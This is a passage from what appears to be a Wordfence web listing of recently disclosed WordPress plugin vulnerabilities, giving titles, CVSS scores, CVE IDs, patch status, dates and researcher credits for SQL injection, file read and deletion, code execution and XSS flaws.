<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f123ac9-1473-482d-b52a-a7d837e61f55" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress 3.3.3 &#8211; 3.7.1 &#8211; Authenticated (Subscriber+) Arbitrary File Read</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75797" target="_blank" rel="noopener noreferrer">							CVE-2026-75797						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</a> <span class="wfvr-software-slug">[ai-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jashid-sany" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2c141f36c58aa14b55fc2863ae33e5d8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2c141f36c58aa14b55fc2863ae33e5d8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jashid-sany" target="_blank" rel="noopener">Jashid Sany</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f123ac9-1473-482d-b52a-a7d837e61f55" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe1e8c38-345a-4529-81ba-188a8dc58503" target="_blank" rel="noopener">Events Manager &lt;= 7.4.0 &#8211; Authenticated (Contributor+) SQL Injection via &#8216;meta_key&#8217; Parameter in Event/Location Duplicate Action</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15023" target="_blank" rel="noopener noreferrer">							CVE-2026-15023						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager" target="_blank" rel="noopener">Events Manager – Calendar, Bookings, Tickets, and more!</a> <span class="wfvr-software-slug">[events-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe1e8c38-345a-4529-81ba-188a8dc58503" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/750bb2b6-4d3e-4e1f-bb93-ede8d7b3ebf1" target="_blank" rel="noopener">Fluent Boards Pro &lt;= 2.0.11 &#8211; Authenticated (Editor+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78275" target="_blank" rel="noopener noreferrer">							CVE-2026-78275						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards-pro" target="_blank" rel="noopener">Fluent Boards Pro</a> <span class="wfvr-software-slug">[fluent-boards-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/750bb2b6-4d3e-4e1f-bb93-ede8d7b3ebf1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01b598a3-8437-4644-badb-438c34a364ed" target="_blank" rel="noopener">FluentCRM Pro &lt;= 3.1.12 &#8211; Authenticated (Author+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78270" target="_blank" rel="noopener noreferrer">							CVE-2026-78270						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentcrm-pro" target="_blank" rel="noopener">FluentCRM Pro – Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution</a> <span class="wfvr-software-slug">[fluentcrm-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01b598a3-8437-4644-badb-438c34a364ed" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/555be499-b57b-4ded-840a-a5cc7b864e98" target="_blank" rel="noopener">Kadence Shop Kit &lt;= 3.0.6 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32550" target="_blank" rel="noopener noreferrer">							CVE-2026-32550						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-shop-kit" target="_blank" rel="noopener">Kadence Shop Kit</a> <span class="wfvr-software-slug">[kadence-shop-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/555be499-b57b-4ded-840a-a5cc7b864e98" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b98367ee-e9fd-4ba8-bbb8-4a03a832e4a6" target="_blank" rel="noopener">Like Button Rating <img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2665.png" alt="&#x2665;" class="wp-smiley"> LikeBtn &lt;= 2.6.61 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78285" target="_blank" rel="noopener noreferrer">							CVE-2026-78285						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/likebtn-like-button" target="_blank" rel="noopener">Like Button Rating <img decoding="async" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2665.png" alt="&#x2665;" class="wp-smiley"> LikeBtn</a> <span class="wfvr-software-slug">[likebtn-like-button]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b98367ee-e9fd-4ba8-bbb8-4a03a832e4a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e554855b-a8d2-4187-9d86-c47d648a29ec" target="_blank" rel="noopener">Media Library Assistant &lt; 3.40 &#8211; Authenticated (Author+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16959" target="_blank" rel="noopener noreferrer">							CVE-2026-16959						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">Media Library Assistant</a> <span class="wfvr-software-slug">[media-library-assistant]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e554855b-a8d2-4187-9d86-c47d648a29ec" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76e2aec2-fd46-40b7-8a94-aae8e7cbc12d" target="_blank" rel="noopener">Order Tip for WooCommerce &lt; 1.6.0 &#8211; Authenticated (Shop Manager+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77693" target="_blank" rel="noopener noreferrer">							CVE-2026-77693						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/order-tip-woo" target="_blank" rel="noopener">Order Tip for WooCommerce</a> <span class="wfvr-software-slug">[order-tip-woo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76e2aec2-fd46-40b7-8a94-aae8e7cbc12d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5dc36acb-94f9-46e0-a7ae-2ae99158425f" target="_blank" rel="noopener">Suggestion Engine for WooCommerce &lt;= 2.0.11 &#8211; Authenticated (Contributor+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81277" target="_blank" rel="noopener noreferrer">							CVE-2026-81277						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-suggestion-engine" target="_blank" rel="noopener">Suggestion Engine for WooCommerce</a> <span class="wfvr-software-slug">[woo-suggestion-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5dc36acb-94f9-46e0-a7ae-2ae99158425f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d38ac39-1005-495f-8947-81da35ff4092" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution &lt; 4.0.6 &#8211; Authenticated (Custom Role+) Arbitrary File Read</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19093" target="_blank" rel="noopener noreferrer">							CVE-2026-19093						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d38ac39-1005-495f-8947-81da35ff4092" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65f68a49-8ded-479f-a9c3-187703bfae65" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.5 &#8211; Unauthenticated Remote Code Execution via &#8216;template&#8217; and &#8216;data&#8217; POST Parameters</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16759" target="_blank" rel="noopener noreferrer">							CVE-2026-16759						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/todd-chaffins" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/df341ae9424df0dae114c9dd0c62dcc2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="df341ae9424df0dae114c9dd0c62dcc2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/todd-chaffins" target="_blank" rel="noopener">Slopothecary</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65f68a49-8ded-479f-a9c3-187703bfae65" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2bbaeb6-7a63-4dbc-b8af-a323dc8fe66f" target="_blank" rel="noopener">Workeera – AI Job Board with Applicant Tracking System (ATS) &lt; 1.0.6 &#8211; Authenticated (Subscriber+) Arbitrary File Read</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77017" target="_blank" rel="noopener noreferrer">							CVE-2026-77017						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/workeera-remote-tech-job-board" target="_blank" rel="noopener">Workeera – AI Job Board with Applicant Tracking System (ATS)</a> <span class="wfvr-software-slug">[workeera-remote-tech-job-board]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shhriyash" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd20b99aec2d2287d2a86d71af4da7e5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd20b99aec2d2287d2a86d71af4da7e5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shhriyash" target="_blank" rel="noopener">Shhriyash</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2bbaeb6-7a63-4dbc-b8af-a323dc8fe66f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4063a82c-82e9-4d25-b252-5d617bddd042" target="_blank" rel="noopener">WPBulky – WordPress Bulk Edit Post Types &lt;= 1.2.2 &#8211; Authenticated (Contributor+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82227" target="_blank" rel="noopener noreferrer">							CVE-2026-82227						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpbulky-wp-bulk-edit-post-types" target="_blank" rel="noopener">WPBulky – WordPress Bulk Edit Post Types</a> <span class="wfvr-software-slug">[wpbulky-wp-bulk-edit-post-types]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4063a82c-82e9-4d25-b252-5d617bddd042" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d2c4a000-94e9-42f1-bdb3-633741fcd54e" target="_blank" rel="noopener">All-in-One WP Migration Unlimited Extension &lt;= 2.84 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via &#8216;ai1wm_backups_path&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6128" target="_blank" rel="noopener noreferrer">							CVE-2026-6128						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
